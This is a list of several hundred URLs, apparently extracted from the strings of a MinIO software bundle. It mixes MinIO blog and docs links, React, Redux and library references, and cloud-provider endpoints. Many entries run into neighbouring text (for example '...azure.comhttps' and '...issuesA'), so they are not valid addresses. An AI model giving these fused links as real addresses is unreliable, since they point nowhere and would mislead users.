[https://blog.min.io/event-notifications-vs-object-lambda/](https://blog.min.io/event-notifications-vs-object-lambda/)
[https://developer.mozilla.org/en-US/docs/Web/API/FileList](https://developer.mozilla.org/en-US/docs/Web/API/FileList)
[https://github.com/lodash/lodash/blob/master/isBoolean.js](https://github.com/lodash/lodash/blob/master/isBoolean.js)
[https://github.com/micromark/micromark-extension-footnote](https://github.com/micromark/micromark-extension-footnote)
[https://github.com/minio/mc/issuespreferred_preauth_types](https://github.com/minio/mc/issuespreferred_preauth_types)
[https://github.com/reduxjs/redux-toolkit/discussions/1648](https://github.com/reduxjs/redux-toolkit/discussions/1648)
[https://graph.windows.net/mariadb.database.azure.comhttps](https://graph.windows.net/mariadb.database.azure.comhttps)
[https://reactrouter.com/utils/create-routes-from-children](https://reactrouter.com/utils/create-routes-from-children)
[https://twitter.com/dan_abramov/status/770914221638942720](https://twitter.com/dan_abramov/status/770914221638942720)
[https://blog.min.io/minio-multi-cloud-azure-marketplace/](https://blog.min.io/minio-multi-cloud-azure-marketplace/)
[https://blog.min.io/minio-versioning-metadata-deep-dive/](https://blog.min.io/minio-versioning-metadata-deep-dive/)
[https://database.cloudapi.de/projects/-/serviceAccounts/](https://database.cloudapi.de/projects/-/serviceAccounts/)
[https://developer.mozilla.org/en-US/docs/Glossary/Base64](https://developer.mozilla.org/en-US/docs/Glossary/Base64)
[https://github.com/facebook/create-react-app/issues/2374](https://github.com/facebook/create-react-app/issues/2374)
[https://redux.js.org/introduction/why-rtk-is-redux-today](https://redux.js.org/introduction/why-rtk-is-redux-today)
[https://redux.js.org/tutorials/fundamentals/part-4-store](https://redux.js.org/tutorials/fundamentals/part-4-store)
[https://unpkg.com/swagger-ui-dist/favicon-16x16.pnghttps](https://unpkg.com/swagger-ui-dist/favicon-16x16.pnghttps)
[https://blog.min.io/minio-postgres-event-notifications/](https://blog.min.io/minio-postgres-event-notifications/)
[https://blog.min.io/subnet-healthcheck-and-performance/](https://blog.min.io/subnet-healthcheck-and-performance/)
[https://min.io/docs/minio/linux/reference/minio-mc.html](https://min.io/docs/minio/linux/reference/minio-mc.html)
[https://reactrouter.com/router-components/memory-router](https://reactrouter.com/router-components/memory-router)
[https://blog.min.io/managing-objects-tagging-policies/](https://blog.min.io/managing-objects-tagging-policies/)
[https://blog.min.io/minio-webhook-event-notifications/](https://blog.min.io/minio-webhook-event-notifications/)
[https://github.com/nodejs/node/blob/master/lib/path.js](https://github.com/nodejs/node/blob/master/lib/path.js)
[https://github.com/remix-run/react-router/issues/10579](https://github.com/remix-run/react-router/issues/10579)
[https://github.com/remix-run/react-router/issues/11052](https://github.com/remix-run/react-router/issues/11052)
[https://reactjs.org/docs/error-decoder.html?invariant=](https://reactjs.org/docs/error-decoder.html?invariant=)
[https://storage.mtls.googleapis.com/storage/v1/storage](https://storage.mtls.googleapis.com/storage/v1/storage)
[https://www.googleapis.com/auth/devstorage.read_writeB](https://www.googleapis.com/auth/devstorage.read_writeB)
[https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html](https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html)
[https://blog.min.io/minio-replication-best-practices/](https://blog.min.io/minio-replication-best-practices/)
[https://bugzilla.mozilla.org/show_bug.cgi?id=1719465.](https://bugzilla.mozilla.org/show_bug.cgi?id=1719465.)
[https://en.wikipedia.org/wiki/Content_Security_Policy](https://en.wikipedia.org/wiki/Content_Security_Policy)
[https://github.com/bvaughn/react-virtualized/pull/124](https://github.com/bvaughn/react-virtualized/pull/124)
[https://github.com/bvaughn/react-virtualized/pull/942](https://github.com/bvaughn/react-virtualized/pull/942)
[https://github.com/remarkjs/react-markdown/issues/576](https://github.com/remarkjs/react-markdown/issues/576)
[https://github.com/tc39/proposal-shadowrealm/pull/384](https://github.com/tc39/proposal-shadowrealm/pull/384)
[https://redux-toolkit.js.org/api/getDefaultMiddleware](https://redux-toolkit.js.org/api/getDefaultMiddleware)
[https://vault.azure.net/mysql.database.azure.comhttps](https://vault.azure.net/mysql.database.azure.comhttps)
[https://www.googleapis.com/auth/cloud-platformstorage](https://www.googleapis.com/auth/cloud-platformstorage)
[https://blog.min.io/introducing-speedtest-for-minio/](https://blog.min.io/introducing-speedtest-for-minio/)
[https://blog.min.io/minio-openid-connect-integration](https://blog.min.io/minio-openid-connect-integration)
[https://bugzilla.mozilla.org/show_bug.cgi?id=1023984](https://bugzilla.mozilla.org/show_bug.cgi?id=1023984)
[https://bugzilla.mozilla.org/show_bug.cgi?id=1414602](https://bugzilla.mozilla.org/show_bug.cgi?id=1414602)
[https://code.google.com/p/smhasher/wiki/MurmurHash3.](https://code.google.com/p/smhasher/wiki/MurmurHash3.)
[https://min.io/resources/img/logo/MINIO_wordmark.png](https://min.io/resources/img/logo/MINIO_wordmark.png)
[https://oauth2.mtls.googleapis.com/tokenedwards25519](https://oauth2.mtls.googleapis.com/tokenedwards25519)
[https://ossrdbms-aad.database.usgovcloudapi.nethttps](https://ossrdbms-aad.database.usgovcloudapi.nethttps)
[https://unpkg.com/rapidoc/dist/rapidoc-min.jsdisplay](https://unpkg.com/rapidoc/dist/rapidoc-min.jsdisplay)
[https://blog.min.io/hybrid-cloud-red-hat-openshift/](https://blog.min.io/hybrid-cloud-red-hat-openshift/)
[https://blog.min.io/introducing-webhooks-for-minio/](https://blog.min.io/introducing-webhooks-for-minio/)
[https://blog.min.io/the-beauty-of-the-panic-button/](https://blog.min.io/the-beauty-of-the-panic-button/)
[https://bugzilla.mozilla.org/show_bug.cgi?id=664884](https://bugzilla.mozilla.org/show_bug.cgi?id=664884)
[https://bugzilla.mozilla.org/show_bug.cgi?id=726227](https://bugzilla.mozilla.org/show_bug.cgi?id=726227)
[https://bugzilla.mozilla.org/show_bug.cgi?id=878297](https://bugzilla.mozilla.org/show_bug.cgi?id=878297)
[https://fb.me/react-async-component-lifecycle-hooks](https://fb.me/react-async-component-lifecycle-hooks)
[https://github.com/Microsoft/TypeScript/issues/3496](https://github.com/Microsoft/TypeScript/issues/3496)
[https://github.com/MikeMcl/decimal.js-light/LICENCE](https://github.com/MikeMcl/decimal.js-light/LICENCE)
[https://github.com/Rob--W/open-in-browser/issues/26](https://github.com/Rob--W/open-in-browser/issues/26)
[https://github.com/sindresorhus/github-markdown-css](https://github.com/sindresorhus/github-markdown-css)
[https://html.spec.whatwg.org/multipage/parsing.html](https://html.spec.whatwg.org/multipage/parsing.html)
[https://ossrdbms-aad.database.chinacloudapi.cnhttps](https://ossrdbms-aad.database.chinacloudapi.cnhttps)
[https://reactrouter.com/hooks/use-in-router-context](https://reactrouter.com/hooks/use-in-router-context)
[https://unpkg.com/detect-gpu@5.0.38/dist/benchmarks](https://unpkg.com/detect-gpu@5.0.38/dist/benchmarks)
[https://www.particleincell.com/2012/bezier-splines/](https://www.particleincell.com/2012/bezier-splines/)
[https://blog.min.io/multi-site-replication-resync/](https://blog.min.io/multi-site-replication-resync/)
[https://blog.min.io/secure-hybrid-cloud-minio-iam/](https://blog.min.io/secure-hybrid-cloud-minio-iam/)
[https://blog.min.io/troubleshooting-disk-failures/](https://blog.min.io/troubleshooting-disk-failures/)
[https://bugs.chromium.org/p/v8/issues/detail?id=90](https://bugs.chromium.org/p/v8/issues/detail?id=90)
[https://en.wikipedia.org/wiki/Cubic_Hermite_spline](https://en.wikipedia.org/wiki/Cubic_Hermite_spline)
[https://esbench.com/bench/5bfee68a4cd7e6009ef61d23](https://esbench.com/bench/5bfee68a4cd7e6009ef61d23)
[https://fonts.googleapis.com/css?family=Montserrat](https://fonts.googleapis.com/css?family=Montserrat)
[https://github.com/remarkjs/remark-react/issues/64](https://github.com/remarkjs/remark-react/issues/64)
[https://github.com/syntax-tree/mdast-util-footnote](https://github.com/syntax-tree/mdast-util-footnote)
[https://github.com/thysultan/stylis.js/tree/v3.5.4](https://github.com/thysultan/stylis.js/tree/v3.5.4)
[https://min.io/docs/minio/linux/index.html?ref=con](https://min.io/docs/minio/linux/index.html?ref=con)
[https://redux.js.org/usage/deriving-data-selectors](https://redux.js.org/usage/deriving-data-selectors)
[https://blog.min.io/subnet-call-home-diagnostics/](https://blog.min.io/subnet-call-home-diagnostics/)
[https://blog.min.io/transparent-data-compression/](https://blog.min.io/transparent-data-compression/)
[https://github.com/acacode/swagger-typescript-api](https://github.com/acacode/swagger-typescript-api)
[https://github.com/jamiebuilds/tinykeys/issues/37](https://github.com/jamiebuilds/tinykeys/issues/37)
[https://github.com/jashkenas/underscore/pull/1247](https://github.com/jashkenas/underscore/pull/1247)
[https://github.com/ljharb/object.assign/issues/17](https://github.com/ljharb/object.assign/issues/17)
[https://github.com/mikolalysenko/interval-tree-1d](https://github.com/mikolalysenko/interval-tree-1d)
[https://mathiasbynens.be/notes/javascript-unicode](https://mathiasbynens.be/notes/javascript-unicode)
[https://min.io/docs/minio/linux/index.htmlinvalid](https://min.io/docs/minio/linux/index.htmlinvalid)
[https://rawgit.com/w3c/input-events/v1/index.html](https://rawgit.com/w3c/input-events/v1/index.html)
[https://reactrouter.com/hooks/use-navigation-type](https://reactrouter.com/hooks/use-navigation-type)
[https://reactrouter.com/routers/picking-a-router.](https://reactrouter.com/routers/picking-a-router.)
[https://slack.min.ioMINIO_API_REPLICATION_WORKERS](https://slack.min.ioMINIO_API_REPLICATION_WORKERS)
[https://blog.min.io/data-authenticity-integrity/](https://blog.min.io/data-authenticity-integrity/)
[https://blog.min.io/subnet-series-communication/](https://blog.min.io/subnet-series-communication/)
[https://blog.min.io/supportability-minio-subnet/](https://blog.min.io/supportability-minio-subnet/)
[https://blog.min.io/why_our_customers_subscribe/](https://blog.min.io/why_our_customers_subscribe/)
[https://dev.azuresynapse.usgovcloudapi.netunable](https://dev.azuresynapse.usgovcloudapi.netunable)
[https://enterprise-updates.ic.min.devconcurrency](https://enterprise-updates.ic.min.devconcurrency)
[https://github.com/radix-ui/primitives/pull/1378](https://github.com/radix-ui/primitives/pull/1378)
[https://github.com/recharts/recharts/issues/2143](https://github.com/recharts/recharts/issues/2143)
[https://github.com/recharts/recharts/issues/3669](https://github.com/recharts/recharts/issues/3669)
[https://github.com/visionmedia/css-parse/pull/49](https://github.com/visionmedia/css-parse/pull/49)
[https://github.com/wooorm/svg-element-attributes](https://github.com/wooorm/svg-element-attributes)
[https://oauth2.googleapis.com/tokenoauth2/google](https://oauth2.googleapis.com/tokenoauth2/google)
[https://reactrouter.com/hooks/use-outlet-context](https://reactrouter.com/hooks/use-outlet-context)
[https://reactrouter.com/router-components/router](https://reactrouter.com/router-components/router)
[https://s3.amazonaws.com/v3/info-service-account](https://s3.amazonaws.com/v3/info-service-account)
[https://tools.ietf.org/rfcdiff?difftype=--hwdiff](https://tools.ietf.org/rfcdiff?difftype=--hwdiff)
[https://www.w3.org/wiki/HTML/Elements/input/file](https://www.w3.org/wiki/HTML/Elements/input/file)
[https://blog.min.io/c-e-compression-encryption/](https://blog.min.io/c-e-compression-encryption/)
[https://blog.min.io/s3-security-access-control/](https://blog.min.io/s3-security-access-control/)
[https://github.com/ladjs/superagent/issues/1680](https://github.com/ladjs/superagent/issues/1680)
[https://github.com/sindresorhus/serialize-error](https://github.com/sindresorhus/serialize-error)
[https://html.spec.whatwg.org/multipage/dnd.html](https://html.spec.whatwg.org/multipage/dnd.html)
[https://man7.org/linux/man-pages/man1/df.1.html](https://man7.org/linux/man-pages/man1/df.1.html)
[https://management.core.usgovcloudapi.net/https](https://management.core.usgovcloudapi.net/https)
[https://microsoftgraph.chinacloudapi.cn/storage](https://microsoftgraph.chinacloudapi.cn/storage)
[https://reactrouter.com/hooks/use-resolved-path](https://reactrouter.com/hooks/use-resolved-path)
[https://www.gnu.org/licenses/agpl-3.0.htmlTotal](https://www.gnu.org/licenses/agpl-3.0.htmlTotal)
[https://www.styled-components.com/docs/advanced](https://www.styled-components.com/docs/advanced)
[https://accounts.google.com/o/oauth2/authhttps](https://accounts.google.com/o/oauth2/authhttps)
[https://blog.min.io/introducing-subnet-health/](https://blog.min.io/introducing-subnet-health/)
[https://bugs.webkit.org/show_bug.cgi?id=156034](https://bugs.webkit.org/show_bug.cgi?id=156034)
[https://cosmos.azure.comgcloud-golang-storage/](https://cosmos.azure.comgcloud-golang-storage/)
[https://fontforge.org/docs/techref/bezier.html](https://fontforge.org/docs/techref/bezier.html)
[https://fusejs.io/concepts/scoring-theory.html](https://fusejs.io/concepts/scoring-theory.html)
[https://github.com/bgrins/TinyColor/issues/254](https://github.com/bgrins/TinyColor/issues/254)
[https://github.com/golang/protobuf/issues/1609](https://github.com/golang/protobuf/issues/1609)
[https://github.com/recharts/recharts/pull/2925](https://github.com/recharts/recharts/pull/2925)
[https://github.com/recharts/recharts/pull/3327](https://github.com/recharts/recharts/pull/3327)
[https://iamcredentials.mtls.googleapis.com/urn](https://iamcredentials.mtls.googleapis.com/urn)
[https://management.core.chinacloudapi.cn/https](https://management.core.chinacloudapi.cn/https)
[https://microsoftgraph.chinacloudapi.cnstorage](https://microsoftgraph.chinacloudapi.cnstorage)
[https://ossrdbms-aad.database.windows.nethttps](https://ossrdbms-aad.database.windows.nethttps)
[https://pkg.go.dev/cloud.google.com/go/storage](https://pkg.go.dev/cloud.google.com/go/storage)
[https://redux-toolkit.js.org/api/createReducer](https://redux-toolkit.js.org/api/createReducer)
[https://blog.min.io/renewing-kes-certificate/](https://blog.min.io/renewing-kes-certificate/)
[https://datatracker.ietf.org/doc/html/rfc7231](https://datatracker.ietf.org/doc/html/rfc7231)
[https://datatracker.ietf.org/doc/html/rfc7540](https://datatracker.ietf.org/doc/html/rfc7540)
[https://github.com/browserify/path-browserify](https://github.com/browserify/path-browserify)
[https://github.com/facebook/hermes/issues/274](https://github.com/facebook/hermes/issues/274)
[https://github.com/remix-run/remix/issues/927](https://github.com/remix-run/remix/issues/927)
[https://iamcredentials.googleapis.com/invalid](https://iamcredentials.googleapis.com/invalid)
[https://min.io/docs/minio/linux/glossary.html](https://min.io/docs/minio/linux/glossary.html)
[https://min.io/subscriptionclient/coordinator](https://min.io/subscriptionclient/coordinator)
[https://oauth2.googleapis.com/device/codeauth](https://oauth2.googleapis.com/device/codeauth)
[https://reactjs.org/docs/hooks-reference.html](https://reactjs.org/docs/hooks-reference.html)
[https://subnet.min.io/cluster/register?token=](https://subnet.min.io/cluster/register?token=)
[https://www.gnu.org/licenses/agpl-3.0.en.html](https://www.gnu.org/licenses/agpl-3.0.en.html)
[https://www.styled-components.com/docs/basics](https://www.styled-components.com/docs/basics)
[https://github.com/cburgmer/rasterizeHTML.js](https://github.com/cburgmer/rasterizeHTML.js)
[https://github.com/facebook/react/pull/26395](https://github.com/facebook/react/pull/26395)
[https://github.com/minio/minio-go/issues.The](https://github.com/minio/minio-go/issues.The)
[https://github.com/minio/minio-go/issues.sum](https://github.com/minio/minio-go/issues.sum)
[https://github.com/sindresorhus/got/pull/537](https://github.com/sindresorhus/got/pull/537)
[https://iamcredentials.UNIVERSE_DOMAIN/error](https://iamcredentials.UNIVERSE_DOMAIN/error)
[https://kubernetes.default.svc/versionfailed](https://kubernetes.default.svc/versionfailed)
[https://redux-toolkit.js.org/api/createSlice](https://redux-toolkit.js.org/api/createSlice)
[https://stackoverflow.com/a/51127130/4671932](https://stackoverflow.com/a/51127130/4671932)
[https://storage.googleapis.com/storage/v1/b/](https://storage.googleapis.com/storage/v1/b/)
[https://www.gnu.org/licenses/gpl-faq.en.html](https://www.gnu.org/licenses/gpl-faq.en.html)
[https://blog.min.io/erasure-coding-vs-raid/](https://blog.min.io/erasure-coding-vs-raid/)
[https://console-endpoint-url/oauth_callback](https://console-endpoint-url/oauth_callback)
[https://en.wikipedia.org/wiki/ISO_week_date](https://en.wikipedia.org/wiki/ISO_week_date)
[https://en.wikipedia.org/wiki/Vacuous_truth](https://en.wikipedia.org/wiki/Vacuous_truth)
[https://github.com/facebook/react/pull/7081](https://github.com/facebook/react/pull/7081)
[https://github.com/facebook/react/pull/7515](https://github.com/facebook/react/pull/7515)
[https://github.com/jonschlinkert/mixin-deep](https://github.com/jonschlinkert/mixin-deep)
[https://github.com/nodejs/node/issues/17469](https://github.com/nodejs/node/issues/17469)
[https://github.com/tc39/proposal-observable](https://github.com/tc39/proposal-observable)
[https://reactrouter.com/components/navigate](https://reactrouter.com/components/navigate)
[https://reactrouter.com/utils/generate-path](https://reactrouter.com/utils/generate-path)
[https://subnet.min.io/terms-and-conditions/](https://subnet.min.io/terms-and-conditions/)
[https://www.electronjs.org/docs/api/process](https://www.electronjs.org/docs/api/process)
[https://www.gnu.org/licenses/agpl-3.0.html.](https://www.gnu.org/licenses/agpl-3.0.html.)
[https://www.youtube.com/watch?v=-PjTSwLB8ZA](https://www.youtube.com/watch?v=-PjTSwLB8ZA)
[https://www.youtube.com/watch?v=0PgMxz0HauA](https://www.youtube.com/watch?v=0PgMxz0HauA)
[https://www.youtube.com/watch?v=5fz3rE3wjGg](https://www.youtube.com/watch?v=5fz3rE3wjGg)
[https://www.youtube.com/watch?v=5ptKrZzOs4c](https://www.youtube.com/watch?v=5ptKrZzOs4c)
[https://www.youtube.com/watch?v=7EJO_iRiB2s](https://www.youtube.com/watch?v=7EJO_iRiB2s)
[https://www.youtube.com/watch?v=89vnToCcoAw](https://www.youtube.com/watch?v=89vnToCcoAw)
[https://www.youtube.com/watch?v=A3vCDaFWNNs](https://www.youtube.com/watch?v=A3vCDaFWNNs)
[https://www.youtube.com/watch?v=BLTlaOvVCSg](https://www.youtube.com/watch?v=BLTlaOvVCSg)
[https://www.youtube.com/watch?v=CrBjB7vbI7M](https://www.youtube.com/watch?v=CrBjB7vbI7M)
[https://www.youtube.com/watch?v=Exg2KsfzHzI](https://www.youtube.com/watch?v=Exg2KsfzHzI)
[https://www.youtube.com/watch?v=G4wQZEsIxcU](https://www.youtube.com/watch?v=G4wQZEsIxcU)
[https://www.youtube.com/watch?v=Hk9Z-sltUu8](https://www.youtube.com/watch?v=Hk9Z-sltUu8)
[https://www.youtube.com/watch?v=Iz8ChZ7FRrw](https://www.youtube.com/watch?v=Iz8ChZ7FRrw)
[https://www.youtube.com/watch?v=KiWWVgfuulU](https://www.youtube.com/watch?v=KiWWVgfuulU)
[https://www.youtube.com/watch?v=Oix9iXndSUY](https://www.youtube.com/watch?v=Oix9iXndSUY)
[https://www.youtube.com/watch?v=QniHMNNmbfI](https://www.youtube.com/watch?v=QniHMNNmbfI)
[https://www.youtube.com/watch?v=UGROqu7mYJs](https://www.youtube.com/watch?v=UGROqu7mYJs)
[https://www.youtube.com/watch?v=UuxqnUgowyg](https://www.youtube.com/watch?v=UuxqnUgowyg)
[https://www.youtube.com/watch?v=XGOiwV6Cbuk](https://www.youtube.com/watch?v=XGOiwV6Cbuk)
[https://www.youtube.com/watch?v=XUuJZVK-Wpw](https://www.youtube.com/watch?v=XUuJZVK-Wpw)
[https://www.youtube.com/watch?v=Yh_1grPSBjw](https://www.youtube.com/watch?v=Yh_1grPSBjw)
[https://www.youtube.com/watch?v=Zyc-xhNcPco](https://www.youtube.com/watch?v=Zyc-xhNcPco)
[https://www.youtube.com/watch?v=_ZEjm4bPgVI](https://www.youtube.com/watch?v=_ZEjm4bPgVI)
[https://www.youtube.com/watch?v=bZsNxeuzmYc](https://www.youtube.com/watch?v=bZsNxeuzmYc)
[https://www.youtube.com/watch?v=dLSBuVG7Y3k](https://www.youtube.com/watch?v=dLSBuVG7Y3k)
[https://www.youtube.com/watch?v=iCxcv4_j35M](https://www.youtube.com/watch?v=iCxcv4_j35M)
[https://www.youtube.com/watch?v=mv8I1wvTCrE](https://www.youtube.com/watch?v=mv8I1wvTCrE)
[https://www.youtube.com/watch?v=nFUI2N5zH34](https://www.youtube.com/watch?v=nFUI2N5zH34)
[https://www.youtube.com/watch?v=sJEFAVqoKr0](https://www.youtube.com/watch?v=sJEFAVqoKr0)
[https://www.youtube.com/watch?v=thNus-DL1u4](https://www.youtube.com/watch?v=thNus-DL1u4)
[https://www.youtube.com/watch?v=vdHv9wfhu24](https://www.youtube.com/watch?v=vdHv9wfhu24)
[https://www.youtube.com/watch?v=z2bRoMrQxv0](https://www.youtube.com/watch?v=z2bRoMrQxv0)
[https://www.youtube.com/watch?v=zqjsw4O2-4U](https://www.youtube.com/watch?v=zqjsw4O2-4U)
[https://batch.core.usgovcloudapi.net/https](https://batch.core.usgovcloudapi.net/https)
[https://blog.min.io/minio-gcp-marketplace/](https://blog.min.io/minio-gcp-marketplace/)
[https://gist.github.com/joelambert/1002116](https://gist.github.com/joelambert/1002116)
[https://github.com/ungap/url-search-params](https://github.com/ungap/url-search-params)
[https://management.microsoftazure.de/empty](https://management.microsoftazure.de/empty)
[https://management.usgovcloudapi.net/https](https://management.usgovcloudapi.net/https)
[https://reactrouter.com/hooks/use-location](https://reactrouter.com/hooks/use-location)
[https://reactrouter.com/hooks/use-navigate](https://reactrouter.com/hooks/use-navigate)
[https://reactrouter.com/utils/match-routes](https://reactrouter.com/utils/match-routes)
[https://reactrouter.com/utils/resolve-path](https://reactrouter.com/utils/resolve-path)
[https://servicebus.usgovcloudapi.net/https](https://servicebus.usgovcloudapi.net/https)
[https://github.com/feross/queue-microtask](https://github.com/feross/queue-microtask)
[https://github.com/minio/minio/issues.Set](https://github.com/minio/minio/issues.Set)
[https://github.com/sindresorhus/type-fest](https://github.com/sindresorhus/type-fest)
[https://github.com/visionmedia/superagent](https://github.com/visionmedia/superagent)
[https://iamcredentials.googleapis.com/v1/](https://iamcredentials.googleapis.com/v1/)
[https://management.chinacloudapi.cn/https](https://management.chinacloudapi.cn/https)
[https://management.core.windows.net/https](https://management.core.windows.net/https)
[https://reactrouter.com/components/outlet](https://reactrouter.com/components/outlet)
[https://reactrouter.com/components/routes](https://reactrouter.com/components/routes)
[https://servicebus.chinacloudapi.cn/https](https://servicebus.chinacloudapi.cn/https)
[https://sts.amazonaws.com/doc/2011-06-15/](https://sts.amazonaws.com/doc/2011-06-15/)
[https://www.gnu.org/licenses/agpl-3.0.txt](https://www.gnu.org/licenses/agpl-3.0.txt)
[https://blog.min.io/active-active-email/](https://blog.min.io/active-active-email/)
[https://github.com/jonschlinkert/kind-of](https://github.com/jonschlinkert/kind-of)
[https://login.microsoftonline.de/storage](https://login.microsoftonline.de/storage)
[https://reactrouter.com/hooks/use-params](https://reactrouter.com/hooks/use-params)
[https://reactrouter.com/hooks/use-routes](https://reactrouter.com/hooks/use-routes)
[https://reactrouter.com/utils/match-path](https://reactrouter.com/utils/match-path)
[https://storage.googleapis.com/duplicate](https://storage.googleapis.com/duplicate)
[https://www.robotstxt.org/robotstxt.html](https://www.robotstxt.org/robotstxt.html)
[https://www.w3.org/TR/SVG11/filters.html](https://www.w3.org/TR/SVG11/filters.html)
[https://database.chinacloudapi.cn/empty](https://database.chinacloudapi.cn/empty)
[https://en.wikipedia.org/wiki/Empty_set](https://en.wikipedia.org/wiki/Empty_set)
[https://github.com/niklasvh/html2canvas](https://github.com/niklasvh/html2canvas)
[https://login.microsoftonline.com/https](https://login.microsoftonline.com/https)
[https://reactrouter.com/hooks/use-match](https://reactrouter.com/hooks/use-match)
[https://sts.UNIVERSE_DOMAIN/v1/tokenurn](https://sts.UNIVERSE_DOMAIN/v1/tokenurn)
[https://vault.microsoftazure.de/reflect](https://vault.microsoftazure.de/reflect)
[https://en.wikipedia.org/wiki/ISO_8601](https://en.wikipedia.org/wiki/ISO_8601)
[https://github.com/minio/minio/issuesA](https://github.com/minio/minio/issuesA)
[https://github.com/mourner/quickselect](https://github.com/mourner/quickselect)
[https://github.com/wojtekmaj/react-pdf](https://github.com/wojtekmaj/react-pdf)
[https://login.microsoftonline.us/https](https://login.microsoftonline.us/https)
[https://manage.chinacloudapi.com/https](https://manage.chinacloudapi.com/https)
[https://reactrouter.com/hooks/use-href](https://reactrouter.com/hooks/use-href)
[https://vault.microsoftazure.dereflect](https://vault.microsoftazure.dereflect)
[https://www.rfc-editor.org/rfc/rfc8297](https://www.rfc-editor.org/rfc/rfc8297)
[https://bugzilla.mozilla.org/1547776.](https://bugzilla.mozilla.org/1547776.)
[https://httpwg.org/specs/rfc9110.html](https://httpwg.org/specs/rfc9110.html)
[https://manage.windowsazure.com/https](https://manage.windowsazure.com/https)
[https://min.io/product/subnet?ref=con](https://min.io/product/subnet?ref=con)
[https://protobuf.dev/reference/go/faq](https://protobuf.dev/reference/go/faq)
[https://batch.core.windows.net/https](https://batch.core.windows.net/https)
[https://blog.min.io/kafka_and_minio/](https://blog.min.io/kafka_and_minio/)
[https://bugzilla.mozilla.org/1841972](https://bugzilla.mozilla.org/1841972)
[https://github.com/mweststrate/immer](https://github.com/mweststrate/immer)
[https://graph.chinacloudapi.cn/https](https://graph.chinacloudapi.cn/https)
[https://login.chinacloudapi.cn/https](https://login.chinacloudapi.cn/https)
[https://manage.windowsazure.us/https](https://manage.windowsazure.us/https)
[https://reactjs.org/docs/events.html](https://reactjs.org/docs/events.html)
[https://servicebus.cloudapi.de/https](https://servicebus.cloudapi.de/https)
[https://servicebus.windows.net/https](https://servicebus.windows.net/https)
[https://stackoverflow.com/a/25340456](https://stackoverflow.com/a/25340456)
[https://vault.usgovcloudapi.nethttps](https://vault.usgovcloudapi.nethttps)
[https://blog.min.io/erasure-coding/](https://blog.min.io/erasure-coding/)
[https://tools.ietf.org/html/rfc2324](https://tools.ietf.org/html/rfc2324)
[https://tools.ietf.org/html/rfc2518](https://tools.ietf.org/html/rfc2518)
[https://tools.ietf.org/html/rfc5322](https://tools.ietf.org/html/rfc5322)
[https://tools.ietf.org/html/rfc6585](https://tools.ietf.org/html/rfc6585)
[https://tools.ietf.org/html/rfc7231](https://tools.ietf.org/html/rfc7231)
[https://tools.ietf.org/html/rfc7232](https://tools.ietf.org/html/rfc7232)
[https://tools.ietf.org/html/rfc7233](https://tools.ietf.org/html/rfc7233)
[https://tools.ietf.org/html/rfc7235](https://tools.ietf.org/html/rfc7235)
[https://tools.ietf.org/html/rfc7538](https://tools.ietf.org/html/rfc7538)
[https://tools.ietf.org/html/rfc7725](https://tools.ietf.org/html/rfc7725)
[https://github.com/warrenweckesser](https://github.com/warrenweckesser)
[https://managedhsm.azure.net/https](https://managedhsm.azure.net/https)
[https://management.azure.com/https](https://management.azure.com/https)
[https://servicebus.azure.net/https](https://servicebus.azure.net/https)
[https://www.w3.org/TR/css-color-4/](https://www.w3.org/TR/css-color-4/)
[https://dev.azuresynapse.nethttps](https://dev.azuresynapse.nethttps)
[https://github.com/burnburnrocket](https://github.com/burnburnrocket)
[https://graph.microsoft.com/https](https://graph.microsoft.com/https)
[https://min.io/compliance?ref=con](https://min.io/compliance?ref=con)
[https://redux.js.org/Errors?code=](https://redux.js.org/Errors?code=)
[https://spec.commonmark.org/0.30/](https://spec.commonmark.org/0.30/)
[https://www.unicode.org/versions/](https://www.unicode.org/versions/)
[https://api.loganalytics.iohttps](https://api.loganalytics.iohttps)
[https://datalake.azure.net/https](https://datalake.azure.net/https)
[https://github.com/wooorm/bcp-47](https://github.com/wooorm/bcp-47)
[https://graph.microsoft.us/https](https://graph.microsoft.us/https)
[https://min.io/download/?ref=con](https://min.io/download/?ref=con)
[https://nodejs.org/api/http.html](https://nodejs.org/api/http.html)
[https://sts.amazonaws.comblake2b](https://sts.amazonaws.comblake2b)
[https://d3js.org/d3-shape/stack](https://d3js.org/d3-shape/stack)
[https://gallery.azure.com/https](https://gallery.azure.com/https)
[https://github.com/juanpgaviria](https://github.com/juanpgaviria)
[https://github.com/kolodny/jsan](https://github.com/kolodny/jsan)
[https://graph.cloudapi.de/https](https://graph.cloudapi.de/https)
[https://html2canvas.hertzen.com](https://html2canvas.hertzen.com)
[https://moment.github.io/luxon/](https://moment.github.io/luxon/)
[https://s3.amazonaws.comignores](https://s3.amazonaws.comignores)
[https://fetch.spec.whatwg.org/](https://fetch.spec.whatwg.org/)
[https://github.com/MrRio/jsPDF](https://github.com/MrRio/jsPDF)
[https://github.com/danielhusar](https://github.com/danielhusar)
[https://github.com/gingerchris](https://github.com/gingerchris)
[https://infra.spec.whatwg.org/](https://infra.spec.whatwg.org/)
[https://redux.js.org/api/store](https://redux.js.org/api/store)
[https://subnet.min.io/?ref=con](https://subnet.min.io/?ref=con)
[https://www.w3.org/TR/cssom-1/](https://www.w3.org/TR/cssom-1/)
[https://github.com/chris-rock](https://github.com/chris-rock)
[https://github.com/jamesbrobb](https://github.com/jamesbrobb)
[https://github.com/lsdriscoll](https://github.com/lsdriscoll)
[https://min.io/signup?ref=con](https://min.io/signup?ref=con)
[https://min.io/videos?ref=con](https://min.io/videos?ref=con)
[https://www.w3.org/TR/WCAG20/](https://www.w3.org/TR/WCAG20/)
[https://blog.min.io/?ref=con](https://blog.min.io/?ref=con)
[https://docs.min.io/?ref=con](https://docs.min.io/?ref=con)
[https://github.com/eaparango](https://github.com/eaparango)
[https://github.com/pablohess](https://github.com/pablohess)
[https://github.com/siefkenj/](https://github.com/siefkenj/)
[https://min.io/signup?ref=mc](https://min.io/signup?ref=mc)
[https://github.com/Flamenco](https://github.com/Flamenco)
[https://github.com/dollaruw](https://github.com/dollaruw)
[https://github.com/flamenco](https://github.com/flamenco)
[https://github.com/ineedfat](https://github.com/ineedfat)
[https://github.com/stefslon](https://github.com/stefslon)
[https://mdn.io/Number/isNaN](https://mdn.io/Number/isNaN)
[https://github.com/BiggA94](https://github.com/BiggA94)
[https://github.com/Gavvers](https://github.com/Gavvers)
[https://github.com/acspike](https://github.com/acspike)
[https://github.com/diegocr](https://github.com/diegocr)
[https://github.com/fjenett](https://github.com/fjenett)
[https://play.min.ioparsing](https://play.min.ioparsing)
[https://crbug.com/1264708](https://crbug.com/1264708)
[https://github.com/jmorel](https://github.com/jmorel)
